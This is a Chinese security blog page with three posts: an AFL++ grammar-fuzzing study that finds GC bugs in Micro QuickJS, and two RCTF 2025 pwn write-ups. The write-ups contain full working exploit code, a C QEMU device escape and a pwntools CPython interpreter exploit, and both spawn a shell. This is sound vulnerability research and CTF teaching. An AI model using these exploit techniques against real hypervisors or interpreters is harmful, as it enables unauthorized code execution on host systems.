分类二进制安全下的文章

AFL++ Grammar Level Fuzzing on Micro QuickJS

作者: rik
时间: 2026-01-20
分类: 二进制安全
评论

0. 起因

2025.12.23 传奇程序员 Bellard（Qemu、ffmpeg、QuickJS、TCC... 原作者）发布了他的新作品 Micro QuickJS（mqjs），这是一个用于嵌入式系统上的 JS 引擎。既然是用纯 C 语言实现的，应该会有一些内存损坏漏洞吧。

1. 准备 fuzzer

组件

我决定用 AFL++ 来运行模糊测试。AFL++ 直接使用的话，构造的是逐字节的随机输入，其中大多数都是无意义的乱码（即使配合 cmplog 等）。对于特定语言解释器来说，我们希望构造的输入能够真正被执行。编译原理告诉我们，从人类可读字符串到机器可执行的字节码或机器码需要经历至少三个阶段：词法分析、语法分析、语义分析。完全随机的输入无疑连词法分析都很难通过，更别说语法分析语义分析了。如果构造的输入根本没法运行，那我们就无法触及有关 VM 和 GC（垃圾回收释放内存）相关的更有价值的漏洞。

西电网信院在大二有一门选修课就是编译原理，最后的大作业是 C 语言标准库手搓自定义绘图语言编译器，十分带劲。不过据说从 24 级开始这门课🈚️了。
我感觉从 LLVM pass 上手会更有实用价值一些。

而如果配合 Grammar-Mutator，我们就可以实现语法级的 fuzzing。我们只需要提供这个语言的语法的生成式，自动编译成自定义 mutator。AFL 运行时就会调用它来将先前的 seed 转变为 AST，再随机选择 AST 中的节点，根据生成式变异为另一个节点或子树，最后再根据 AST 生成代码作为新的 seed。（具体可以看这篇文章）

当然，编译时 Address Sanitizer 也必不可少（-fsanitize=address）。我试过再加上 UB Sanitizer，但是随便一运行就爆了，难道到处都是 UB？

问题修复

一开始运行 Grammar-Mutator 有时会报错 _pick_non_term_node returns NULL 然后直接退出。不知道为什么它在极罕见情况下会找不到某个非终结符能够用来变异的生成式。

遇到这种情况就不变异吧，直接把整个 AFL 停了真的好吗，，修改代码如下即可：

diff --git a/src/tree_mutation.c b/src/tree_mutation.c
index 68e91f9..62da2ed 100644
--- a/src/tree_mutation.c
+++ b/src/tree_mutation.c
@@ -39,8 +39,10 @@ tree_t *random_mutation(tree_t *tree) {
   if (unlikely(node == NULL)) {
 
     // By design, _pick_non_term_node should not return NULL
-    perror("_pick_non_term_node returns NULL");
-    exit(EXIT_FAILURE);
+    // perror("_pick_non_term_node returns NULL");
+    // exit(EXIT_FAILURE);
+
+    return mutated_tree;
 
   }
 
@@ -203,9 +205,10 @@ tree_t *splicing_mutation(tree_t *tree) {
   if (unlikely(node == NULL)) {
 
     // By design, _pick_non_term_node should not return NULL
-    perror("_pick_non_term_node returns NULL");
-    exit(EXIT_FAILURE);
+    // perror("_pick_non_term_node returns NULL");
+    // exit(EXIT_FAILURE);
 
+    return mutated_tree;
   }
 
   node_t *parent = node->parent;

执行

编写 fuzzing harness 用于 persistent mode，同时按照 Grammar-Mutator 的官方文档编译好 mutator library，自动生成初始种子。我们在 aflplusplus/aflplusplus docker container 里用以下参数运行 AFL：

while true; do AFL_DISABLE_TRIM=1 AFL_CUSTOM_MUTATOR_LIBRARY=./libgrammarmutator-javascript.so AFL_USE_ASAN=1 afl-fuzz -i seeds/ -o out/ -b 2 -a text -G 1024 -t 200 -S asan -- ./mjs_harness_asan; sleep 1; done

运行过程中我总结了一些经验：

我选择关闭 ptrim，因为对于语法级 fuzzing，trim 反而会丢失复杂的结构，使之后的变异难以发现新的分支。
加上超时是对的，但是不能太低，跑得慢的 seed 反而更有价值（复杂的 GC 行为）。
Grammar-Mutator 根据 AST 进行变异像是一个无限深度递归，所以 cycles 几乎不会增长，这是正常的。

2. Fuzzing 结果

大约 11 小时后，第一批 crashes 出现了：

id 000000 内容大概是：

var a = [];
var b = [];
var c = [];
var d = [];
(Infinity**((((a+(((((((((((((((((((((new Float64Array(0,0/0,0,{g: false})))))))))))))))))))))==(~0)))))));
function Float64Array(console, EvalError,Int16Array,Reflect,NaN){
new Float64Array(false,TypeError[[[((((((((((((((((((((((((((((((((((((((((((((((((((((d.concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat([b],{f: []}).concat((((--b) >>> -0)),(((--b) >>> -0)),(((--b) >>> 
// 暂不完整公开 ...

可以看到其中有明显的无限递归，另外还有大量的 concat，这无疑同时给堆和栈带来了巨大的内存分配压力，也就很可能出现 GC 相关的漏洞。

对此，Address Sanitizer 的评价是：

=================================================================
==1599335==ERROR: AddressSanitizer: negative-size-param: (size=-2112)
    #0 0x55f81ffe8449 in __asan_memmove (/home/rik/Desktop/crashes/mjs_harness_asan+0x17e449) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #1 0x55f8200c1be2 in JS_MakeUniqueString /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/mquickjs.c:2032:5
    #2 0x55f8200aab94 in JS_ToPropertyKey /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/mquickjs.c:4193:16
    #3 0x55f8200aab94 in JS_Call /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/mquickjs.c:6009:28
    #4 0x55f82011a802 in JS_Run /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/mquickjs.c:11799:11
    #5 0x55f82003e19b in LLVMFuzzerTestOneInput /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/fuzz_harness.c:140:15
    #6 0x55f820038c59 in ExecuteFilesOnyByOne (/home/rik/Desktop/crashes/mjs_harness_asan+0x1cec59) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #7 0x55f820038a38 in LLVMFuzzerRunDriver (/home/rik/Desktop/crashes/mjs_harness_asan+0x1cea38) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #8 0x55f8200385c6 in main (/home/rik/Desktop/crashes/mjs_harness_asan+0x1ce5c6) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #9 0x7f24f4027634 in __libc_start_call_main /usr/src/debug/glibc/glibc/csu/../sysdeps/nptl/libc_start_call_main.h:58:16
    #10 0x7f24f40276e8 in __libc_start_main /usr/src/debug/glibc/glibc/csu/../csu/libc-start.c:360:3
    #11 0x55f81feef3e4 in _start (/home/rik/Desktop/crashes/mjs_harness_asan+0x853e4) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)

0x7f24f0c4f8b8 is located 327864 bytes inside of 4194304-byte region [0x7f24f0bff800,0x7f24f0fff800)
allocated by thread T0 here:
    #0 0x55f81ffeb905 in malloc (/home/rik/Desktop/crashes/mjs_harness_asan+0x181905) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)
    #1 0x55f82003cee9 in LLVMFuzzerTestOneInput /home/rik/Desktop/fuzzing/mjs-fuzzing/mquickjs/fuzz_harness.c:112:21
    #2 0x55f820038c59 in ExecuteFilesOnyByOne (/home/rik/Desktop/crashes/mjs_harness_asan+0x1cec59) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4)

SUMMARY: AddressSanitizer: negative-size-param (/home/rik/Desktop/crashes/mjs_harness_asan+0x17e449) (BuildId: 44bae498641fcf1516b886c154ce5bcf4f3fdee4) in __asan_memmove
==1599335==

负数 size？

过了一会，又出现了七百多个崩溃，我想是时候开始分析了。

3. 分析 crashes

Micro QuickJS 的 GC 过程如下：

先将整个堆扫描一遍来标记需要释放的对象（JS_MTAG_FREE），

/* 'size' is in bytes and must be multiple of JSW and > 0 */
static void set_free_block(void *ptr, uint32_t size)
{
    JSFreeBlock *p;
    p = (JSFreeBlock *)ptr;
    p->mtag = JS_MTAG_FREE;
    p->gc_mark = 0;
    p->size = (size - sizeof(JSFreeBlock)) / sizeof(JSWord);
}

然后在 JS_GC2 中使用 Jonkers 算法来释放内存（gc_compact_heap）。具体来说，就是把所有不是 JS_MTAG_FREE 标记的对象都向低地址移，填补所有 JS_MTAG_FREE 对象带来的空洞。

    /* pass 2: update the threaded pointers and move the block to its
       final position */
    new_ptr = ctx->heap_base;
    ptr = ctx->heap_base;
    while (ptr < ctx->heap_free) {
        gc_update_threaded_pointers(ctx, ptr, new_ptr);
        size = get_mblock_size(ptr);
        if (js_get_mtag(ptr) != JS_MTAG_FREE) {
            if (new_ptr != ptr) {
                memmove(new_ptr, ptr, size);
            }
            new_ptr += size;
        }
        ptr += size;
    }
    ctx->heap_free = new_ptr;

一个很关键的问题是，这样的 GC 有可能会移动对象的位置，所以 GC 的下一步是修改引用方的指针到移动后的位置。不在 JS VM 栈中的对象指针（例如在裸 C 数组里的 JS 对象指针）就无法被追踪到，它们就会立刻沦为垂悬指针。所以在编写 mqjs 期间需要时刻注意哪些函数可能触发 GC，并将临时变量推入 JS VM 栈中。

这几百个崩溃几乎都是因为没有注意到可能 GC 的函数导致的。例如 2 中提到的崩溃，

static JSValue JS_MakeUniqueString(JSContext *ctx, JSValue val) {
    // ...
    
    arr = JS_VALUE_TO_PTR( ctx->unique_strings);
    val1 = find_atom(ctx, &a, arr, ctx->unique_strings_len, val); 
    if (!JS_IsNull(val1))
        return val1;
    
    JS_PUSH_VALUE(ctx, val);
    is_numeric = js_is_numeric_string(ctx, val);
    JS_POP_VALUE(ctx, val);
    if (is_numeric < 0)
        return JS_EXCEPTION;
    
    /* not found: add it in the table */
    JS_PUSH_VALUE(ctx, val);
    new_tab = js_resize_value_array(ctx, ctx->unique_strings,
                                 ctx->unique_strings_len + 1);
    JS_POP_VALUE(ctx, val);
    if (JS_IsException(new_tab))
        return JS_EXCEPTION;
    ctx->unique_strings = new_tab;
    arr = JS_VALUE_TO_PTR( ctx->unique_strings);
    memmove(&arr->arr[a + 1], &arr->arr[a],
            sizeof(arr->arr[0]) * (ctx->unique_strings_len - a));
    
    // ...
}

可以看到 JS_MakeUniqueString 首先从 ctx->unique_strings 中搜索（find_atom）相同字符串的索引（a）。这是一种常见的优化，在创建任何字符串前都在一个字符串表里检查有没有重复字符串，如果有就直接使用它如果没有再分配新空间并插入表中，避免重复浪费内存。但是由于 ctx->unique_strings_len 在 find_atom 和 memmove 之间减小了（被 GC 清理了一部分），所以 ctx->unique_strings_len - a 变成了负数！（a 应该永远小于 ctx->unique_strings_len。）其中 js_is_numeric_string 和 js_resize_value_array 都有可能触发 GC（主要是 js_is_numeric_string）。

按照以上思路，我们还能找到其他 GC UAF 漏洞，甚至可利用的漏洞。事实上，我们可以修改 mqjs 源码，使其在每次申请内存前都执行一次 GC，这样能更高效地挖掘出类似的漏洞，无需等待 AFL 随机出有 GC 压力的 seed。（这应该是一个通用的技巧）

4. 利用

...

5. 修复

对于 2 中提到的崩溃，比较简单的修复方案就是在 memmove 前再执行一次 find_atom 定位插入位置。另外 js_is_numeric_string 也不应该需要 O(n) 空间复杂度。

...

在 QuickJS-NG 也可以通过相同方案找到有意义的漏洞。

RCTF 2025 bbox Writeup

作者: rik
时间: 2025-12-16
分类: 二进制安全
评论

RCTF 2025 pwn，继 mstr 之后再复现一个相对简单的 qemu escape bbox，如果有空的话再看看那个 v8pwn。（画饼ing

Challenge

附件 docker archive 中 qemu-system-x86_64 实现了一个自定义 PCI 设备 virtsec-device。借助 AI 可以很快还原两个关键的结构体：

00000000 struct block // sizeof=0x18
00000000 {
00000000     unsigned int id;
00000004     unsigned int size;
00000008     unsigned int _pad1;
0000000C     unsigned int offset;
00000010     unsigned int _pad2;
00000014     unsigned __int8 encrypted;
00000015     unsigned __int8 valid;
00000016     unsigned __int8 _pad3[2];
00000018 };

00000000 struct virtsec_device // sizeof=0x10E8
00000000 {
00000000     unsigned __int8 _pad0[3024];
00000BD0     unsigned int status;
00000BD4     unsigned int session_id;
00000BD8     unsigned int error_code;
00000BDC     unsigned __int8 _pad1[32];
00000BFC     unsigned int alloc_size;
00000C00     unsigned int _pad2[2];
00000C08     struct block blocks[16];
00000D88     unsigned int _pad3;
00000D8C     unsigned int current_id;
00000D90     unsigned int merge_id1;
00000D94     unsigned int merge_id2;
00000D98     unsigned __int8 data[256];
00000E98     void (*func_ptr)(void *);
00000EA0     void *func_arg;
00000EA8     unsigned __int8 _pad4[256];
00000FA8     unsigned __int8 key_buffer[256];
000010A8     unsigned int reg_10A8;
000010AC     unsigned __int8 _pad6[36];
000010D0     unsigned __int64 reg_10D0;
000010D8     unsigned __int64 reg_10D8;
000010E0     unsigned __int64 reg_10E0;
000010E8 };

之后的逆向就比较轻松了。可以看到这个设备在 256 字节的空间里管理 16 个 blocks，每个块初始大小最高 0x10，但可以通过 merge 命令合并两个及多个块，直至 256 字节。设备还有 gift 寄存器，向其中写入任意内容后，设备将在设备结构体中紧随 data 之后分别写入 printf 函数指针和一个字符串指针，再次触发 gift 就会将后者作为首个参数执行前者。（另外还有 session、神秘 command 3 和 xor 加解密，不知道能干啥。）

这个 PCI 设备通过 MMIO 交互，我们可以在 virtsec_class_init 找到 Vendor ID 0x1234和 Device ID 0x5678。在 qemu 虚拟机内执行 lspci 查询 PCI resource 路径（00:04.0 Class 0580: 1234:5678）。

出题人非常贴心的在每个操作都输出了 log，要想看到 qemu_log 输出便于调试，可以添加 qemu 命令行参数 -d guest_errors -D qemu.log（qemu_loglevel_mask_64(2048) 是 LOG_GUEST_ERROR）。

Bug

问题出在块合并，merge 似乎没有任何长度检查，只要分配大于 16 个块合并在一起就能轻松拿到大于 256 字节的块，从而越界读写 gift。virtsec_free_block 提示 UAF 但其实应该没有。

Exploit

只需要将函数指针改成 system，参数改成 sh 就好了。然而由于某些神秘原因，直接向 offset 256 写入的话 qemu 就直接爆了（？

不过块合并时自然也会复制数据的，所以就改成先在小块里写好这两个数据然后越界合并覆盖就好。free block 竟然只能全部 reset，那只好重新 merge 一遍了。

有点不懂为什么 escape 之后又打印出 welcome to RCTF2025!This is my gift!hello，可能是 pwntools 的问题吧（

Exp:

#include <fcntl.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>

#define REG_CMD 0x0C
#define REG_ID 0x14
#define REG_SIZE 0x18
#define REG_MERGE1 0x30
#define REG_MERGE2 0x34
#define REG_GIFT 0x38

#define CMD_SESSION 1
#define CMD_ALLOC 2
#define CMD_SELECT 3
#define CMD_MERGE 4
#define CMD_RESET 6

int fd;
volatile void *mmio_ptr;

static void write_reg32(int offset, uint32_t value) {
    *(volatile uint32_t *)(mmio_ptr + offset) = value;
}

static void trig_gift() { write_reg32(REG_GIFT, 0xcafebabe); }

// static void new_session() { write_reg32(REG_CMD, CMD_SESSION); }

static void alloc_blk(uint32_t id, uint32_t size) {
    write_reg32(REG_ID, id);
    write_reg32(REG_SIZE, size);
    write_reg32(REG_CMD, CMD_ALLOC);
}

static void select_blk(uint32_t id) {
    write_reg32(REG_ID, id);
    // write_reg(REG_CMD, CMD_SELECT);
}

static void merge_blk(uint32_t id1, uint32_t id2) {
    write_reg32(REG_MERGE1, id1);
    write_reg32(REG_MERGE2, id2);
    write_reg32(REG_CMD, CMD_MERGE);
}

static void dev_res() { write_reg32(REG_CMD, CMD_RESET); }

static uint32_t read_data32(size_t offset) {
    return *(volatile uint32_t *)(mmio_ptr + 0x1000 + offset);
}

static uint64_t read_data64(size_t offset) {
    uint32_t low32 = read_data32(offset);
    uint32_t high32 = read_data32(offset + 4);
    return ((uint64_t)high32 << 32) | low32;
}

static void write_data32(size_t offset, uint32_t data) {
    *(volatile uint32_t *)(mmio_ptr + 0x1000 + offset) = data;
}

static void write_data64(size_t offset, uint64_t data) {
    write_data32(offset, (uint32_t)data);
    write_data32(offset + 4, (uint32_t)(data >> 32));
}

int main(void) {
    fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR);
    if (fd < 0) {
        perror("open");
        exit(EXIT_FAILURE);
    }
    puts("[*] Device opened.");
    mmio_ptr = mmap(NULL, 0x2000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (mmio_ptr == MAP_FAILED) {
        perror("mmap");
        exit(EXIT_FAILURE);
    }
    puts("[*] MMIO mmaped.");

    // new_session();
    for (size_t i = 0; i < 16; ++i) {
        alloc_blk(i, 0x10);
    }
    puts("[*] Blocks allocated.");
    for (size_t i = 1; i < 16; ++i) {
        merge_blk(0, i);
    }
    puts("[*] Blocks merged.");
    alloc_blk(1, 0x10);
    merge_blk(0, 1);
    puts("[+] Block merged overflow.");

    trig_gift();
    select_blk(0);
    size_t host_system_addr =
        read_data64(256) - 0xf980;                    // glibc system - printf
    size_t host_sh_addr = host_system_addr - 0x38761; // glibc "sh" - system
    printf("[+] Host `system` address: 0x%lx\n", host_system_addr);
    printf("[+] Host `\"sh\"` address: 0x%lx\n", host_sh_addr);

    dev_res();
    puts("[*] Reset.");
    for (size_t i = 0; i < 16; ++i) {
        alloc_blk(i, 0x10);
    }
    puts("[*] Blocks allocated.");
    for (size_t i = 1; i < 16; ++i) {
        merge_blk(0, i);
    }
    puts("[*] Blocks merged.");
    alloc_blk(1, 0x10);
    select_blk(1);
    write_data64(0, host_system_addr);
    write_data64(8, host_sh_addr);
    merge_blk(0, 1);
    puts("[+] Gift rewritten.");

    trig_gift();

    munmap((void *)mmio_ptr, 0x2000);
    close(fd);
    return 0;
}

直接读写 MMIO 的指针一定要 ➕ volatile，否则可能被编译器优化掉。

RCTF 2025 mstr Writeup

作者: rik
时间: 2025-11-21
分类: 二进制安全
评论

少见的 Python interpreter pwn，漏洞点也很有意思。

Challenge

Python 3.12.4

import ctypes

from typing import Union, List, Dict

STRPTR_OFFSET = 0x28 
LENPTR_OFFSET = 0x10

class MutableStr:
    pass

class MutableStr:
    def __init__(self, data:str):
        self.data = data
        self.base_ptr = id(self.data)
        self.max_size_str = ""

    def set_max_size(self, max_size_str):
        if int(max_size_str) < ((len(self)+7) & ~7):
            self.max_size_str = max_size_str
        else:
            print("can't set max_size: too big")

    def __repr__(self):
        return self.data

    def __str__(self):
        return self.__repr__()        

    def __len__(self):
        if self.base_ptr is None:
            return 0
        ptr = ctypes.cast(self.base_ptr + LENPTR_OFFSET, ctypes.POINTER(ctypes.c_int64))
        return ptr[0]
    
    def __getitem__(self, key:int):
        if not isinstance(key, int):
            raise NotImplementedError
        if key >= len(self) or key < 0:
            raise RuntimeError("get overflow")
        
        return self.data[key]

    def __setitem__(self, key:int, value:int):
        if not isinstance(value, int):
            raise NotImplementedError("only support integer value")

        if not isinstance(key, int):
            raise NotImplementedError("only support integer key")

        if key >= len(self) or key < 0:
            raise RuntimeError(f"set overflow: length:{len(self)}, key:{key}")
        
        strptr = ctypes.cast(self.base_ptr + STRPTR_OFFSET, ctypes.POINTER(ctypes.c_char))
        strptr[key] = value
    
    def __add__(self, other:Union[str,MutableStr]):
        if isinstance(other, str):
            return MutableStr(self.data + other)
        
        if isinstance(other, MutableStr):
            return MutableStr(self.data + other.data)
        
        raise NotImplementedError()
    
    def _add_str(self, other):
        if self.max_size_str == "":
            max_size = (len(self)+7) & ~7
        else:
            max_size = int(self.max_size_str)
        if len(self)+len(other) <= max_size:
            other_len = len(other)
            strptr = ctypes.cast(self.base_ptr + STRPTR_OFFSET, ctypes.POINTER(ctypes.c_char))
            otherstrptr = ctypes.cast(id(other) + STRPTR_OFFSET, ctypes.POINTER(ctypes.c_char))
            for i in range(other_len):
                strptr[i+len(self)] = otherstrptr[i]
            if len(self)+other_len < max_size:
                # strptr[len(self)+other_len] = 0 
                pass
            ctypes.cast(self.base_ptr + LENPTR_OFFSET, ctypes.POINTER(ctypes.c_int64))[0] += other_len
        else:
            print("Full!")
        return self
    
    def __iadd__(self, other):
        if isinstance(other, str):
            return self._add_str(other)
        if isinstance(other, MutableStr):
            return self._add_str(other.data)
        return self

def new_mstring(data:str) -> MutableStr:
    return MutableStr(data)

mstrings:List[MutableStr] = []

def main():
    while True:
        try:
            cmd, data, *values = input("> ").split()
            if cmd == "new":
                mstrings.append(new_mstring(data))
            
            if cmd == "set_max":
                idx = int(values[0])
                if idx >= len(mstrings) or idx < 0:
                    print("invalid index")
                    continue
                mstrings[idx].set_max_size(data)
            
            if cmd == "+":
                idx1 = int(data)
                idx2 = int(values[0])
                if idx1 < 0 or idx1 >= len(mstrings) or idx2 < 0 or idx2 >= len(mstrings):
                    print("invalid index")
                    continue
                mstrings.append(mstrings[idx1]+mstrings[idx2])

            if cmd == "+=":
                idx1 = int(data)
                idx2 = int(values[0])
                if idx1 < 0 or idx1 >= len(mstrings) or idx2 < 0 or idx2 >= len(mstrings):
                    print("invalid index")
                    continue
                mstrings[idx1] += mstrings[idx2]

            if cmd == "print_max":
                idx = int(data)
                if idx >= len(mstrings) or idx < 0:
                    print("invalid index")
                    continue
                print(mstrings[idx].max_size_str)

            if cmd == "print":
                idx = int(data)
                if idx >= len(mstrings) or idx < 0:
                    print("invalid index")
                    continue
                print(mstrings[idx].data)

            if cmd == "modify":
                idx = int(data)
                offset = int(values[0])
                val = values[1]
                
                if idx >= len(mstrings) or idx < 0:
                    print("invalid index")
                    continue
                mstrings[idx][offset] = int(val)
        except EOFError:
            break
        except Exception as e:
            print(f"error: {e}")

print("hello!", flush=True)
main()

省流：Python 的 str 不可变，题目用 ctypes 强行实现了一个可变字符串 MutableStr。

赛中手写了个 fuzzer，发现了一个很有意思的崩溃，但一直没看懂。（好在让我意识到 CPython 对单字节字符串有特别的优化，见下文。）

Hello!
> new O
> modify 0 0 0
这样就有可能 SIGSEGV，原因是空指针解引用。

Bug

CPython 给每个单字节字符串预先分配了一个对象，位于 python 本身的数据段，所有相同的单字节字符串都指向同一个地方。如果我们先 new 一个 MutableStr '6'，将另一个 MutableStr 的 max_size_str 设置成 '6'，那么接下来改 '6' 就是改另一个 MutableStr 的 max_size_str。（考虑到最终 getshell 时的一些细节，需要用 6 而不是 7。）

Hello!
> new 6
> new 0
> set_max 6 1
> print_max 1
6
> += 0 0
> print_max 1
66

我们由此可以获得任意长溢出写。

CPython 用 PyASCIIObject 存储纯单字节字符串，记录长度，不依赖尾空字节。如果字符串里有非 ASCII 字符，就会改用 PyCompactUnicodeObject，此时 0x28（STRPTR_OFFSET）偏移处新增两个 8 字节字段 utf8_length 和 utf8。（见源码 Python-3.12.4/Include/cpython/unicodeobject.h）

typedef struct {
    PyObject_HEAD
    Py_ssize_t length;
    Py_hash_t hash;
    struct {
        unsigned int interned:2;
        unsigned int kind:3;
        unsigned int compact:1;
        unsigned int ascii:1;
        unsigned int statically_allocated:1;
        unsigned int :24;
    } state;
} PyASCIIObject;

typedef struct {
    PyASCIIObject _base;
    Py_ssize_t utf8_length;
    char *utf8;
} PyCompactUnicodeObject;

数据紧随这两个结构体之后（8 字节对齐）。CPython 存储 Unicode 字符采用定长编码，通常 UCS2（类似 UTF16），遇到大于两字节的字符则 UCS4。当 utf8 不为 NULL 时，print 就不再重新 UCS2 转 UTF8，而是直接根据这两个字段打印字符串。

但是 MutableStr 没有正确处理非 ASCII 情况，当拼接字符串时仍然向原偏移处即字符串末尾前 16 字节处写入字符串并且增加长度（注意 Python 的字符串长度是指 Unicode 码点数），我们可以结合篡改 max_size_str 从而泄露 Unicode 字符串 data 后任意偏移大约 16 字节的信息。

Exploit

笔者十分不喜欢 glibc heap pwn。以下解法不依赖特定 libc 版本，也没有 🏠。

每个 PyObject 都有一个 PyTypeObject 指针，表示对象的类型，其中有类型信息和各种操作的虚函数指针等。由于动态分配的对象在 pymalloc（不大于 512 字节）或 libc 堆上，所以理所应当可能有相邻对象的 PyTypeObject 指针，从而泄露 PIE 基址。

这里有个细节，当实际使用 print 命令打印这个字符串时，泄露出来的信息会变成其他字符。这是 builtin_print 时编码转换导致的，我们的脚本需要将实际输出的内容看做 UTF8 字节流再转为 UCS2 字节流以获取原始泄露信息。

得到基址后，我们再越界写篡改刚才提到的预先分配好的单字节字符串对象的 PyTypeObject 指针，提前伪造虚函数表，print 伪造了虚函数表的 data 从而劫持控制流。

Exp:

from pwn import *

context(arch='amd64', os='linux', log_level='debug', terminal = ['konsole', '-e'])
binary = './python'
io = process([binary, 'mstr.py'])
e = ELF(binary)

itob = lambda x: str(x).encode()
print_leaked = lambda name, addr: success(f'{name}: 0x{addr:x}')

def new_bytes(content: bytes, index: int) -> None:
    io.sendlineafter(b'> ', b'new ' + b'\x00' * len(content))
    context.log_level='info'
    for i, c in enumerate(content):
        io.sendlineafter(b'> ', f'modify {index} {i} {c}'.encode())
    context.log_level='debug'


io.sendlineafter(b'> ', 'new 瑞克'.encode())
io.sendlineafter(b'> ', 'new \x00'.encode()) # for fake type
io.sendlineafter(b'> ', 'new 6'.encode())
io.sendlineafter(b'> ', b'set_max 6 0')
io.sendlineafter(b'> ', b'set_max 6 1')
io.sendlineafter(b'> ', b'+= 2 2')
io.sendlineafter(b'> ', b'+= 2 2') # max size 6666
io.sendlineafter(b'> ', b'new ' + b'\x00' * 20)
io.sendlineafter(b'> ', '+= 0 3'.encode())
io.sendlineafter(b'> ', 'print 0'.encode())

data_leaked = io.recvline(drop=True).decode('utf-8').encode('utf-16-le')
# for i in range(0, len(data_leaked) - 8, 8):
#     print(f'{u64(data_leaked[i: i + 8]):#x}')
e.address = u64(data_leaked[16:24]) - e.sym['PyBytes_Type']
if e.address % 0x1000 != 0:
    exit(1)
print_leaked('elf_base', e.address)

gdb.attach(io, f'awa *{e.sym['_PyRuntime'] + 62000}')
# modify PyTypeObject ptr & construct fake PyTypeObject
new_bytes(b'cafebab' + cyclic(40).replace(b'caaadaaa', p64(e.sym['_PyRuntime'] + 62000)).replace(
    # For some reasons, `ph\x00` will become `sh\x00` (+= 3)
    b'aaaa', b'ph\x00\x00') + b'\x00' * 88 + p64(e.plt['system']), 4)
io.sendlineafter(b'> ', b'+= 1 4')

io.sendlineafter(b'> ', 'new \x01'.encode())  # fake type victim
io.sendlineafter(b'> ', 'print 5'.encode())  # invoke virtual function

io.interactive()

🐍🔥🐍🔥🐍🔥🐍🔥

由于堆布局每次运行时不同，只是有概率成功（如果加上堆喷可以做到每次成功）。以上 exploit 不破坏控制流完整性，即使开启 SHSTK 和 IBT 保护也可以绕过。